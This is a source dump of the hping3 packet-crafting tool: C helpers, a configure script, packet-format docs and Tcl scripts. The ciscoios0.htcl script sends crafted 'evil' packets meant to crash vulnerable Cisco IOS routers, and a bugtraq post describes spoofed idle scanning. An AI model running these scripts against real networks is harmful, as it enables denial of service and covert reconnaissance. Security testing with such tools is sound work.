length 'len' into an hex string 63 | * rappresentation, writing it at 'dest'. The 'dest' buffer should 64 | * have enough space to hold (len*2)+1 bytes. The result of the 65 | * conversion is nul-terminated. 66 | * 67 | * This function can't fail. */ 68 | void bintohex(char *dest, void *bin, int len) 69 | { 70 | unsigned char *b = bin; 71 | int i, high, low; 72 | 73 | for (i = 0; i < len; i++) { 74 | low = *b & 0xF; 75 | high = (*b & 0xF0) >> 4; 76 | *dest++ = hcharset[high]; 77 | *dest++ = hcharset[low]; 78 | b++; 79 | } 80 | } 81 | 82 | /* This example main show the usage. */ 83 | #ifdef TESTMAIN 84 | #include 85 | int main(int argc, char **argv) 86 | { 87 | unsigned char *buf; 88 | char *xbuf; 89 | int hlen, blen, i; 90 | 91 | if (argc == 1) 92 | exit(1); 93 | 94 | /* Convert from hex to binary */ 95 | hlen = strlen(argv[1]); 96 | blen = (hlen+1)/2; 97 | buf = malloc(blen); 98 | if (!buf) 99 | exit(1); 100 | hextobin(buf, argv[1], -1); 101 | for (i = 0; i < blen; i++) { 102 | printf("%02x", buf[i]); 103 | } 104 | printf("\n"); 105 | 106 | /* and from binary to hex */ 107 | xbuf = malloc((blen*2)+1); 108 | if (!xbuf) 109 | exit(1); 110 | bintohex(xbuf, buf, blen); 111 | printf("%s\n", xbuf); 112 | return 0; 113 | } 114 | #endif 115 | -------------------------------------------------------------------------------- /lib/isn-spectrogram.htcl: -------------------------------------------------------------------------------- 1 | # isn-spectrogram.htcl -- show the ISN increments "spectrogram". 2 | # Copyright(C) 2003 Salvatore Sanfilippo. 3 | # 4 | # All rights reserved. 5 | # 6 | # Here the idea is very simple, in operating systems implemeting 7 | # ISN as random increments, it is useless to analyze the whole 8 | # sequence number, because the random part is just the increment. 9 | # Morover, some weaknes isn't about correlation between previous 10 | # and successive increments, but just about increments don't show 11 | # a good distribution. So the idea is to display a spectrogram 12 | # of the increments distribution instead of the more complex to read 13 | # 3D attractors (See [1]). This way is possible to see at least some of 14 | # the common vulnerabilties you can discover with 3D attractors, 15 | # but it is much simpler to guess how hard is to exploit the system 16 | # just from the picture. 17 | # 18 | # [1] http://razor.bindview.com/publish/papers/tcpseq.html 19 | # 20 | # Please if you make this script better write me back the 21 | # changes. (antirez@invece.org). 22 | # 23 | # The script requires Tk to run. 24 | 25 | package require Tk 26 | source hpingstdlib.htcl 27 | 28 | if {$argc != 3} { 29 | puts stderr "Usage: isn-spectrogram " 30 | puts stderr "Example: isn-spectrogram www.example.com 100000 80" 31 | exit 32 | } 33 | 34 | set bgcolor {#000000} 35 | wm title . {hping3 -- attractors} 36 | set w .main 37 | frame $w 38 | pack $w -side top 39 | . config -background $bgcolor 40 | $w config -background $bgcolor 41 | 42 | # canvas 43 | set xres 800 44 | set yres 800 45 | canvas $w.can -width $xres -height $yres 46 | $w.can config -background $bgcolor 47 | pack $w.can -fill both -expand true 48 | 49 | # globals 50 | foreach {hostname div dport} $argv break 51 | set sport 1 52 | #set dport 80 53 | set target [hping resolve $hostname] 54 | set targetif [outifname $target] 55 | set myip [hping outifa $target] 56 | set isnqueue {} 57 | set relative_attractor 1 58 | set lastisn 0 59 | #set div 10000000 60 | 61 | hping setfilter $targetif "tcp and src host $target" 62 | 63 | 64 | $w.can create rectangle 40 450 139 450 -fill white -width 0 65 | $w.can create text 90 470 -fill white -text [expr $div*100] 66 | 67 | proc sendsyn {} { 68 | global sport dport myip target 69 | append syn "ip(saddr=$myip,daddr=$target,ttl=255)+" 70 | append syn "tcp(sport=$sport,dport=$dport,flags=s)" 71 | hping send $syn 72 | incr sport 73 | after 1 sendsyn 74 | } 75 | 76 | proc recvsynack {} { 77 | global lastisn relative_attractor 78 | 79 | set packets [hping recv eth0 0 0] 80 | foreach p $packets { 81 | if {![hping hasfield tcp flags $p]} continue 82 | set isn [hping getfield tcp seq $p] 83 | if {$relative_attractor} { 84 | set tisn [expr abs($isn-$lastisn)] 85 | set lastisn $isn 86 | set isn $tisn 87 | } 88 | #puts "ISN: $isn" 89 | displaypoint $isn 90 | } 91 | after 10 recvsynack 92 | } 93 | 94 | proc displaypoint isn { 95 | global w xres yres pastcol div 96 | 97 | set isn [expr $isn/$div] 98 | set y 300 99 | set x $isn 100 | puts "$x $y" 101 | if {[haskey pastcol $x.$y]} { 102 | set graylevel [incr pastcol($x.$y) 10] 103 | } else { 104 | set pastcol($x.$y) 0 105 | set graylevel 0 106 | } 107 | if {$graylevel >= 256*3} { 108 | set graylevel [expr (256*3)-1] 109 | } 110 | if {$graylevel <= 255} { 111 | set b $graylevel 112 | set g 0 113 | set r 0 114 | } elseif {$graylevel <= 511} { 115 | set b 0 116 | set g [expr $graylevel - 256] 117 | set r 255 118 | } elseif {$graylevel <= 767} { 119 | set b 255 120 | set g 255 121 | set r [expr $graylevel - 512] 122 | } 123 | set color [format "#%02X%02X%02X" $r $g $b] 124 | $w.can create rectangle $x $y [expr $x+1] [expr $y+100] -fill $color -width 0 125 | } 126 | 127 | after 1 sendsyn 128 | after 1 recvsynack 129 | 130 | vwait forever 131 | 132 | # vim: filetype=tcl softtabstop=4 133 | -------------------------------------------------------------------------------- /lib/ciscoios0.htcl: -------------------------------------------------------------------------------- 1 | ################################################################################ 2 | # 3 | # Helper functions 4 | # This will be part of the hping standard library (possibly modified) 5 | # 6 | 7 | # Return the name of the output interface for address addr 8 | proc outifname addr { 9 | set ifa [hping outifa $addr] 10 | set interfaces [hping iflist] 11 | foreach i $interfaces { 12 | if {$ifa == [lindex $i 1]} { 13 | return [lindex $i 0] 14 | } 15 | } 16 | error "Unable to find the output interface name for $addr" 17 | } 18 | 19 | proc GetApdField {protocol field packet} { 20 | set re "$protocol\\(.*?$field=(.*?)\[,\\)\].*?\\)" 21 | if [regexp $re $packet match value] { 22 | return $value 23 | } else { 24 | return {} 25 | } 26 | } 27 | 28 | proc GetIpSaddr packet { return [GetApdField ip saddr $packet] } 29 | proc GetIpDaddr packet { return [GetApdField ip daddr $packet] } 30 | proc GetIpTtl packet { return [GetApdField ip ttl $packet] } 31 | proc GetTcpSport packet { return [GetApdField tcp sport $packet] } 32 | proc GetTcpDport packet { return [GetApdField tcp dport $packet] } 33 | proc GetIcmpType packet { return [GetApdField icmp type $packet ] } 34 | proc GetIcmpCode packet { return [GetApdField icmp code $packet ] } 35 | proc GetIcmpId packet { return [GetApdField icmp id $packet ] } 36 | 37 | # Return non-zero if the host addr seems awake. 38 | # This is done sending a TCP ACK packet and an ICMP echo request 39 | # and searching for at least a reply. 40 | proc isawake addr { 41 | set addr [hping resolve $addr] 42 | set ifname [outifname $addr] 43 | set ifaddr [hping outifa $addr] 44 | 45 | hping recv eth0 0 46 | 47 | set ip "ip(saddr=$ifaddr,daddr=$addr,ttl=64)" 48 | append ack $ip "+tcp(sport=11005,dport=11111,flags=a)" 49 | append icmp $ip "+icmp(type=8,code=8,id=11111)" 50 | 51 | hping send $ack 52 | hping send $icmp 53 | 54 | for {set i 0} {$i < 10} {incr i} { 55 | set packets [hping recv $ifname 100 0] 56 | foreach p $packets { 57 | if {([GetIpSaddr $p] == $addr) && (([GetIcmpId $p] == 11111) || ([GetTcpSport $p] == 11111))} { 58 | return 1; 59 | } 60 | } 61 | } 62 | return 0; 63 | } 64 | 65 | # 66 | # End of the hping standard library 67 | # 68 | ################################################################################ 69 | 70 | # 71 | # Start 72 | # 73 | if {[llength $argv] == 0} { 74 | puts "Usage: hping exec countops.htcl targethost" 75 | } 76 | 77 | set target [hping resolve [lindex $argv 0]] 78 | puts "Target IP: $target" 79 | 80 | set outif [outifname $target] 81 | puts "Output Interface: $outif" 82 | 83 | set outifa [hping outifa $target] 84 | puts "Output Interface address: $outifa" 85 | 86 | # 87 | # Initialize the interface in reception 88 | # 89 | hping recv eth0 0 90 | 91 | # 92 | # Send an ACK packet to port 11111 93 | # 94 | set ack "ip(saddr=$outifa,daddr=$target,ttl=64)+" 95 | append ack "tcp(sport=11005,dport=11111,flags=a)" 96 | puts "sending the ACK packet..." 97 | hping send $ack 98 | 99 | # 100 | # Wait up to 3 seconds for incoming packets 101 | # Note that timeout is in milliseconds 102 | # 103 | set packets [hping recv $outif 3000 0] 104 | 105 | set ttl {} 106 | foreach p $packets { 107 | #puts "[GetIpSaddr $p] -> [GetIpDaddr $p]" 108 | if {[string match "*saddr=$target*" $p]} { 109 | #regexp {ttl=([0-9]+)} $p match ttl 110 | set ttl [GetIpTtl $p] 111 | } 112 | } 113 | 114 | if {$ttl == {}} { 115 | puts "Sorry, no response back from $target" 116 | exit 1 117 | } 118 | 119 | set hops [expr 32-($ttl%32)] 120 | puts "Hops distance appears to be: $hops" 121 | 122 | # 123 | # Ready to test the CISCO problem 124 | # 125 | 126 | incr hops -1 127 | foreach protocol {53 55 77 104} { 128 | puts "Sending evil packet with protocol $protocol" 129 | set evil "ip(saddr=$outifa,daddr=$target,ttl=$hops,proto=$protocol)+" 130 | append evil "data(str=01234567890123456789123456)" 131 | hping send $evil 132 | } 133 | 134 | # 135 | # Test if the host is still awake 136 | # 137 | 138 | if [isawake $target] { 139 | puts "The host appears to be still alive" 140 | } else { 141 | puts "The host appears to be down: vulnerable router?" 142 | } 143 | -------------------------------------------------------------------------------- /configure: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | show_help() 4 | { 5 | echo configure help: 6 | echo "--help show this help" 7 | echo "--no-tcl disable TCL scripting support" 8 | echo " even if uid != euid" 9 | } 10 | 11 | if [ "$1" = "--help" ]; then 12 | show_help 13 | exit 0 14 | fi 15 | 16 | CC=${CC:=cc} 17 | 18 | echo build byteorder.c... 19 | $CC byteorder.c -o byteorder || exit 1 20 | 21 | INSTALL_MANPATH=`echo $MANPATH|cut -f1 -d:` 22 | if [ "$INSTALL_MANPATH" = "" ]; then 23 | INSTALL_MANPATH="/usr/local/man" 24 | fi 25 | BYTEORDER=`./byteorder -m` 26 | 27 | echo create byteorder.h... 28 | cat > byteorder.h <> byteorder.h 34 | echo \#define $BYTEORDER >> byteorder.h 35 | echo \#endif /\* $BYTEORDER \*/ >> byteorder.h 36 | cat >> byteorder.h < Found Tclsh in: $TCLSH" 75 | fi 76 | fi 77 | done 78 | done 79 | if [ -f $TCLSH ] 80 | then 81 | TCL_VER=`echo puts \\$tcl_version | $TCLSH -` 82 | USE_TCL='-DUSE_TCL' 83 | TCL_LIB="-ltcl${TCL_VER}" 84 | if [ -e /usr/include/tcl${TCL_VER} ] 85 | then 86 | TCL_INC="-I/usr/include/tcl${TCL_VER}" 87 | elif [ -e /usr/include/tcl.h ] 88 | then 89 | TCL_INC="" 90 | elif [ -e /usr/local/include/tcl${TCL_VER} ] 91 | then 92 | TCL_INC="-I/usr/local/include/tcl${TCL_VER}" 93 | else 94 | USE_TCL="" 95 | TCL_LIB="" 96 | echo "==> WARNING: no Tcl header files found!" 97 | fi 98 | fi 99 | if [ -n $USE_TCL ] 100 | then 101 | LIBPOSTFIX=`ls -1 /usr/local/lib/ /usr/lib | grep 'libtcl[0-9]' | grep so | sed -e 's/\.so.*//g' -e 's/libtcl//g' | sort -r | head -1` 102 | TCL_LIB="-ltcl${LIBPOSTFIX} -lm -lpthread" 103 | fi 104 | 105 | # 106 | # configurable stuff 107 | # 108 | PCAP="PCAP=-lpcap" 109 | PCAP_INCLUDE="" 110 | 111 | for ARG in $*; do 112 | case "$ARG" in 113 | *"--no-tcl") 114 | USE_TCL="" 115 | TCL_VER="" 116 | TCL_INC="" 117 | TCL_LIB="" 118 | ;; 119 | esac 120 | done 121 | 122 | echo -------------------------------------- 123 | echo system type: $CONFIGOSTYPE 124 | echo 125 | echo "LIBPCAP : $PCAP" 126 | echo "PCAP_INCLUDE : $PCAP_INCLUDE" 127 | echo "MANPATH : $INSTALL_MANPATH" 128 | echo "USE_TCL : $USE_TCL" 129 | echo "TCL_VER : $TCL_VER" 130 | echo "TCL_INC : $TCL_INC" 131 | echo "LIBTCL : $TCL_LIB" 132 | echo "TCLSH : $TCLSH" 133 | echo 134 | echo "(to modify try configure --help)" 135 | echo -------------------------------------- 136 | 137 | echo creating Makefile... 138 | sed -e "s^@PCAP@^$PCAP^g" \ 139 | -e "s^@PCAP_INCLUDE@^$PCAP_INCLUDE^g" \ 140 | -e "s^@MANPATH@^$INSTALL_MANPATH^g" \ 141 | -e "s^@SOLARISLIB@^$SOLARISLIB^g" \ 142 | -e "s^@USE_TCL@^$USE_TCL^g" \ 143 | -e "s^@TCL_INC@^$TCL_INC^g" \ 144 | -e "s^@TCL_VER@^$TCL_VER^g" \ 145 | -e "s^@TCL_LIB@^$TCL_LIB^g" \ 146 | Makefile 147 | 148 | # 149 | # 150 | # 151 | 152 | cat > systype.h <> systype.h 158 | cat >> systype.h < .depend 165 | 166 | echo now you can try \`make\' 167 | -------------------------------------------------------------------------------- /lib/ciscoios.htcl: -------------------------------------------------------------------------------- 1 | ################################################################################ 2 | # 3 | # Helper functions 4 | # This will be part of the hping standard library (possibly modified) 5 | # 6 | 7 | # Return the name of the output interface for address addr 8 | proc outifname addr { 9 | set ifa [hping outifa $addr] 10 | set interfaces [hping iflist] 11 | foreach i $interfaces { 12 | if {$ifa == [lindex $i 1]} { 13 | return [lindex $i 0] 14 | } 15 | } 16 | error "Unable to find the output interface name for $addr" 17 | } 18 | 19 | proc GetApdField {protocol field packet} { 20 | set re "$protocol\\(.*?$field=(.*?)\[,\\)\].*?\\)" 21 | if [regexp $re $packet match value] { 22 | return $value 23 | } else { 24 | return {} 25 | } 26 | } 27 | 28 | proc GetIpSaddr packet { return [GetApdField ip saddr $packet] } 29 | proc GetIpDaddr packet { return [GetApdField ip daddr $packet] } 30 | proc GetIpTtl packet { return [GetApdField ip ttl $packet] } 31 | proc GetTcpSport packet { return [GetApdField tcp sport $packet] } 32 | proc GetTcpDport packet { return [GetApdField tcp dport $packet] } 33 | proc GetIcmpType packet { return [GetApdField icmp type $packet ] } 34 | proc GetIcmpCode packet { return [GetApdField icmp code $packet ] } 35 | proc GetIcmpId packet { return [GetApdField icmp id $packet ] } 36 | 37 | # Return non-zero if the host addr seems awake. 38 | # This is done sending a TCP ACK packet and an ICMP echo request 39 | # and searching for at least a reply. 40 | proc isawake addr { 41 | set addr [hping resolve $addr] 42 | set ifname [outifname $addr] 43 | set ifaddr [hping outifa $addr] 44 | 45 | hping recv eth0 0 46 | 47 | set ip "ip(saddr=$ifaddr,daddr=$addr,ttl=64)" 48 | append ack $ip "+tcp(sport=11005,dport=11111,flags=a)" 49 | append icmp $ip "+icmp(type=8,code=8,id=11111)" 50 | 51 | hping send $ack 52 | hping send $icmp 53 | 54 | for {set i 0} {$i < 10} {incr i} { 55 | set packets [hping recv $ifname 100 0] 56 | foreach p $packets { 57 | if {([GetIpSaddr $p] == $addr) && (([GetIcmpId $p] == 11111) || ([GetTcpSport $p] == 11111))} { 58 | return 1; 59 | } 60 | } 61 | } 62 | return 0; 63 | } 64 | 65 | # 66 | # End of the hping standard library 67 | # 68 | ################################################################################ 69 | 70 | # 71 | # Start 72 | # 73 | if {[llength $argv] == 0} { 74 | puts "Usage: hping exec countops.htcl targethost" 75 | } 76 | 77 | set target [hping resolve [lindex $argv 0]] 78 | puts "Target IP: $target" 79 | 80 | set outif [outifname $target] 81 | puts "Output Interface: $outif" 82 | 83 | set outifa [hping outifa $target] 84 | puts "Output Interface address: $outifa" 85 | 86 | # 87 | # Initialize the interface in reception 88 | # 89 | hping recv eth0 0 90 | 91 | # 92 | # Send an ACK packet to port 11111 93 | # The script use the RST reply to guess the Hops distance 94 | # 95 | set ack "ip(saddr=$outifa,daddr=$target,ttl=64)+" 96 | append ack "tcp(sport=11005,dport=11111,flags=a)" 97 | puts "sending the ACK packet..." 98 | hping send $ack 99 | 100 | # 101 | # Wait up to 3 seconds for incoming packets 102 | # Note that timeout is in milliseconds 103 | # 104 | set ttl {} 105 | for {set i 0} {$i < 30} {incr i} { 106 | set packets [hping recv $outif 100 0] 107 | foreach p $packets { 108 | if {[string match "*saddr=$target*" $p]} { 109 | set ttl [GetIpTtl $p] 110 | set i 30 111 | break 112 | } 113 | } 114 | } 115 | 116 | if {$ttl == {}} { 117 | puts "Sorry, no response back from $target" 118 | exit 1 119 | } 120 | 121 | set hops [expr 32-($ttl%32)] 122 | puts "Hops distance appears to be: $hops" 123 | 124 | # 125 | # Ready to test the CISCO problem 126 | # 127 | 128 | incr hops -1 129 | foreach protocol {53 55 77 104} { 130 | puts "Sending evil packet with protocol $protocol" 131 | set evil "ip(saddr=$outifa,daddr=$target,ttl=$hops,proto=$protocol)+" 132 | append evil "data(str=01234567890123456789123456)" 133 | #hping send $evil 134 | } 135 | 136 | # 137 | # Test if the host is still awake 138 | # 139 | 140 | puts "Waiting for 3 seconds..." 141 | after 3000 142 | if [isawake $target] { 143 | puts "The host appears to be still alive" 144 | } else { 145 | puts "The host appears to be down: vulnerable router?" 146 | } 147 | -------------------------------------------------------------------------------- /display_ipopt.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1989 The Regents of the University of California. 3 | * All rights reserved. 4 | * 5 | * This code is derived from software contributed to Berkeley by 6 | * Mike Muuss. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 3. All advertising materials mentioning features or use of this software 17 | * must display the following acknowledgement: 18 | * This product includes software developed by the University of 19 | * California, Berkeley and its contributors. 20 | * 4. Neither the name of the University nor the names of its contributors 21 | * may be used to endorse or promote products derived from this software 22 | * without specific prior written permission. 23 | * 24 | * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND 25 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 26 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 27 | * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE 28 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 29 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 30 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 31 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 32 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 33 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 34 | * SUCH DAMAGE. 35 | */ 36 | 37 | /* $Id: display_ipopt.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 38 | 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | 46 | #include "hping2.h" 47 | #include "globals.h" 48 | 49 | /* ripped from ping */ 50 | 51 | void display_ipopt(char* buf) 52 | { 53 | int i,j; 54 | unsigned long l; 55 | static int old_rrlen; 56 | static char old_rr[MAX_IPOPTLEN]; 57 | unsigned char* cp; 58 | int hlen; 59 | struct myiphdr *ip; 60 | struct in_addr in; 61 | 62 | 63 | ip = (struct myiphdr *)buf; 64 | hlen = ip->ihl * 4; 65 | 66 | cp = (u_char *)buf + sizeof(struct myiphdr); 67 | 68 | for (; hlen > (int)sizeof(struct myiphdr); --hlen, ++cp) 69 | switch (*cp) { 70 | case IPOPT_EOL: 71 | hlen = 0; 72 | break; 73 | case IPOPT_LSRR: 74 | (void)printf("LSRR: "); 75 | hlen -= 2; 76 | j = *++cp; 77 | ++cp; 78 | if (j > IPOPT_MINOFF) 79 | for (;;) { 80 | l = *++cp; 81 | l = (l<<8) + *++cp; 82 | l = (l<<8) + *++cp; 83 | l = (l<<8) + *++cp; 84 | in.s_addr=htonl(l); 85 | printf("\t%s",inet_ntoa(in)); 86 | hlen -= 4; 87 | j -= 4; 88 | if (j <= IPOPT_MINOFF) 89 | break; 90 | (void)putchar('\n'); 91 | } 92 | break; 93 | case IPOPT_RR: 94 | j = *++cp; /* get length */ 95 | i = *++cp; /* and pointer */ 96 | hlen -= 2; 97 | if (i > j) 98 | i = j; 99 | i -= IPOPT_MINOFF; 100 | if (i <= 0) 101 | continue; 102 | if (i == old_rrlen 103 | && cp == (u_char *)buf + sizeof(struct myiphdr) + 2 104 | && !memcmp((char *)cp, old_rr, i)) { 105 | (void)printf("\t(same route)\n"); 106 | i = ((i + 3) / 4) * 4; 107 | hlen -= i; 108 | cp += i; 109 | break; 110 | } 111 | old_rrlen = i; 112 | memcpy(old_rr, cp, i); 113 | (void)printf("RR: "); 114 | for (;;) { 115 | l = *++cp; 116 | l = (l<<8) + *++cp; 117 | l = (l<<8) + *++cp; 118 | l = (l<<8) + *++cp; 119 | in.s_addr=htonl(l); 120 | printf("\t%s",inet_ntoa(in)); 121 | hlen -= 4; 122 | i -= 4; 123 | if (i <= 0) 124 | break; 125 | (void)putchar('\n'); 126 | } 127 | putchar('\n'); 128 | 129 | break; 130 | case IPOPT_NOP: 131 | (void)printf("NOP\n"); 132 | break; 133 | default: 134 | (void)printf("unknown option %x\n", *cp); 135 | break; 136 | } 137 | 138 | } 139 | -------------------------------------------------------------------------------- /docs/APD.txt: -------------------------------------------------------------------------------- 1 | ARS Packet Description system 2 | 3 | This document describes the APD format. APD is a way to describe TCP/IP 4 | packets, and it is used in high level functions of the ARS library. 5 | The general format is the following: 6 | 7 | layer_type{field_1=value_1,field_2=value_2,...,field_n=value_n} 8 | 9 | more layers can be combined using the "+" simbol. Example: 10 | 11 | ip{dst=192.168.1.2}+udp{sport=53,dport=53}+data{file=./dns.packet} 12 | 13 | You don't need to specify fields that ARS can guess. For example 14 | if you don't specify checksums they will be correctly generated 15 | in the process of packet compilation. 16 | 17 | AVAILABLE LAYERS 18 | ~~~~~~~~~~~~~~~~ 19 | 20 | A layer type is one of the following: 21 | 22 | ip IP header 23 | ipopt.eol IP option EOL 24 | ipopt.nop IP option NOP 25 | ipopt.sec IP option Security 26 | ipopt.sid IP option Stream ID 27 | ipopt.lsrr IP option Loose Source Routing 28 | ipopt.ssrr IP option Strict Source Routing 29 | ipopt.rr IP option Record Route 30 | ipopt.ts IP option Timestamp 31 | udp UDP header 32 | tcp TCP header 33 | tcpopt.eol TCP option END (EOL) 34 | tcpopt.nop TCP option NOP 35 | tcpopt.mss TCP option Max Segment Size 36 | tcpopt.wscale TCP option Window Scale 37 | tcpopt.sackperm TCP option Selective ACK permitted 38 | tcpopt.sack TCP option Selective ACK 39 | tcpopt.echoreq TCP option Echo Request 40 | tcpopt.echoreply TCP option Echo Reply 41 | tcpopt.ts TCP option Timestamp 42 | icmp ICMP header 43 | data Generic Data 44 | 45 | Different fields are defined for different layer types: 46 | 47 | IP FIELDS: DESCRIPTION: POSSIBLE VALUE: 48 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 49 | saddr Source address 192.168.1.2, or www.yahoo.com 50 | daddr Destination address 192.168.1.2, or www.yahoo.com 51 | ihl IP header len numerical value 52 | ver IP version numerical value 53 | tos Type of Service numerical value 54 | totlen IP tot len numerical value 55 | id IP packet ID numerical value 56 | fragoff IP fragment offset numerical vaule 57 | mf More Fragment 0 or 1 58 | df Dont Fragment 0 or 1 59 | rf Reserved Frag. bit 0 or 1 60 | ttl Time to Live numerical value 61 | proto ip protocol field numerical value 62 | cksum ip checksum numerical value 63 | 64 | UDP FIELDS: DESCRIPTION: POSSIBLE VALUE: 65 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 66 | sport Source port numerical value 67 | dport Destination port numerical value 68 | len UDP len field numerical value 69 | cksum UDP checksum numerical value 70 | 71 | TCP FIELDS: DESCRIPTION: POSSIBLE VALUE: 72 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 73 | sport Source port numerical value 74 | dport Destination port numerical value 75 | seq TCP sequence number numerical value 76 | ack TCP acknowledge number numerical value 77 | x2 TCP reserved bits numerical value 78 | off TCP header size numerical value 79 | flags TCP flags FSRPAUXY (see the example) 80 | win TCP window numerical value 81 | cksum TCP checksum numerical value 82 | urp TCP urgent pointer numerical value 83 | 84 | ICMP FIELDS: DESCRIPTION: POSSIBLE VALUE: 85 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 86 | type ICMP type numerical value 87 | code ICMP code numerical value 88 | cksum ICMP cksum numerical value 89 | id ICMP echo ID numerical value 90 | seq ICMP echo sequence nr numerical value 91 | gw ICMP gateway 192.168.1.2 or www.yahoo.com 92 | unused ICMP 32bit id/seq/gw numerical value 93 | 94 | DATA FIELDS: DESCRIPTION: POSSIBLE VALUE: 95 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 96 | file Data file /etc/passwd 97 | str A string hello world! (no escaping available) 98 | uint32 A 32bit integer numerical value 99 | uint24 A 24bit integer numerical value 100 | uint16 A 16bit integer numerical value 101 | uint8 A 8bit integer numerical value 102 | 103 | Other layer types fields aren't still implemented, anyway 104 | most of this contains sane defaults, (like IP record route option 105 | and so on). 106 | 107 | You can specify numerical values as hex, octal and decimal numbers. 108 | 109 | Decimail: 10 110 | Hex: 0xA 111 | Octal: 012 112 | 113 | Examples 114 | ~~~~~~~~ 115 | 116 | /* Just an ICMP echo request */ 117 | ip{saddr=1.2.3.4,daddr=www.yahoo.com}+icmp{type=8,code=0}\ 118 | +data{str=hello world} 119 | 120 | /* An ICMP destination unreachable with the quoted UDP packet */ 121 | ip{saddr=1.2.3.4,daddr=5.6.7.8}+icmp{type=3,code=3}\ 122 | +ip{saddr=www.yahoo.com,daddr=1.2.3.4}+udp{sport=53,dport=53}\ 123 | 124 | /* A TCP packet with the SYN flag set */ 125 | ip{saddr=1.2.3.4,daddr=5.6.7.8}+tcp{flags=S,dport=80,sport=10} 126 | -------------------------------------------------------------------------------- /docs/SPOOFED_SCAN.txt: -------------------------------------------------------------------------------- 1 | The following is the original posting to bugtraq 2 | about spoofed/indirect/idle scan method. See 3 | the HPING2-HOWTO for more informations. 4 | 5 | antirez 6 | 7 | --- 8 | 9 | Hi, 10 | 11 | I have uncovered a new tcp port scan method. 12 | Instead all others it allows you to scan using spoofed 13 | packets, so scanned hosts can't see your real address. 14 | In order to perform this i use three well known tcp/ip 15 | implementation peculiarities of most OS: 16 | 17 | (1) * hosts reply SYN|ACK to SYN if tcp target port is open, 18 | reply RST|ACK if tcp target port is closed. 19 | 20 | (2) * You can know the number of packets that hosts are sending 21 | using id ip header field. See my previous posting 'about the ip 22 | header' in this ml. 23 | 24 | (3) * hosts reply RST to SYN|ACK, reply nothing to RST. 25 | 26 | 27 | The Players: 28 | 29 | host A - evil host, the attacker. 30 | host B - silent host. 31 | host C - victim host. 32 | 33 | A is your host. 34 | B is a particular host: It must not send any packets while 35 | you are scanning C. There are a lot of 'zero traffic' hosts 36 | in internet, especially in the night :) 37 | C is the victim, it must be vulnerable to SYN scan. 38 | 39 | I've called this scan method 'dumb host scan' in honour of host 40 | B characteristics. 41 | 42 | 43 | How it works: 44 | 45 | Host A monitors number of outgoing packets from B using id iphdr. 46 | You can do this simply using hping: 47 | 48 | #hping B -r 49 | HPING B (eth0 xxx.yyy.zzz.jjj): no flags are set, 40 data bytes 50 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=0 ttl=64 id=41660 win=0 time=1.2 ms 51 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=1 ttl=64 id=+1 win=0 time=75 ms 52 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=2 ttl=64 id=+1 win=0 time=91 ms 53 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=3 ttl=64 id=+1 win=0 time=90 ms 54 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=4 ttl=64 id=+1 win=0 time=91 ms 55 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=5 ttl=64 id=+1 win=0 time=87 ms 56 | -cut- 57 | .. 58 | . 59 | 60 | As you can see, id increases are always 1. So this host have the 61 | characteristics that host B should to own. 62 | 63 | Now host A sends SYN to port X of C spoofing from B. 64 | (using hping => 0.67 is very easy, http://www.kyuzz.org/antirez) 65 | if port X of C is open, host C will send SYN|ACK to B (yes, 66 | host C don't know that the real sender is A). In this 67 | case host B replies to SYN|ACK with a RST. 68 | If we send to host C a few of SYN it will reply to B with a few 69 | of SYN|ACK, so B will reply to C a few of RST... so 70 | we'll see that host B is sending packets! 71 | 72 | . 73 | .. 74 | -cut- 75 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=17 ttl=64 id=+1 win=0 time=96 ms 76 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=18 ttl=64 id=+1 win=0 time=80 ms 77 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=19 ttl=64 id=+2 win=0 time=83 ms 78 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=20 ttl=64 id=+3 win=0 time=94 ms 79 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=21 ttl=64 id=+1 win=0 time=92 ms 80 | 60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=22 ttl=64 id=+2 win=0 time=82 ms 81 | -cut- 82 | .. 83 | . 84 | 85 | The port is open! 86 | 